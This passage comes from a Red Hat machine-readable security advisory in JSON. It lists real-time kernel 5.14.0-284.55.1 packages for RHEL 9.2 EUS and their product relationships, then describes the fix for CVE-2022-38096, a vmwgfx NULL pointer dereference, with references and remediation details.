"category": "product_version",
"name": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-modules-extra@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debug-debuginfo@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product": {
"name": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_id": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/kernel-rt-debuginfo-common-x86_64@5.14.0-284.55.1.rt14.340.el9_2?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src"
},
"product_reference": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV EUS (v.9.2)",
"product_id": "NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "NFV-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src"
},
"product_reference": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64 as a component of Red Hat Enterprise Linux Real Time EUS (v.9.2)",
"product_id": "RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
},
"product_reference": "kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"relates_to_product_reference": "RT-9.2.0.Z.EUS"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2022-38096",
"cwe": {
"id": "CWE-476",
"name": "NULL Pointer Dereference"
},
"discovery_date": "2022-09-09T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2133452"
}
],
"notes": [
{
"category": "description",
"text": "A NULL pointer dereference issue was found in the Linux kernel\u0027s vmwgfx driver in vmw_cmd_dx_define_query. This flaw allows a local, unprivileged attacker with access to either /dev/dri/card0 or /dev/dri/rendererD128, who can issue an ioctl() on the resulting file descriptor, to crash the system, causing a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: vmwgfx: NULL pointer dereference in vmw_cmd_dx_define_query",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Systems making use of the vmwgfx driver are potentially affected by this flaw; systems without the vmwgfx driver loaded are not affected by this flaw.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2022-38096"
},
{
"category": "external",
"summary": "RHBZ#2133452",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2133452"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-38096"
}
],
"release_date": "2022-09-09T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-02-28T12:36:50+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nThe system must be rebooted for this update to take effect.",
"product_ids": [
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"NFV-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-debuginfo-common-x86_64-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"NFV-9.2.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.src",
"RT-9.2.0.Z.EUS:kernel-rt-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
"RT-9.2.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-284.55.1.rt14.340.el9_2.x86_64",
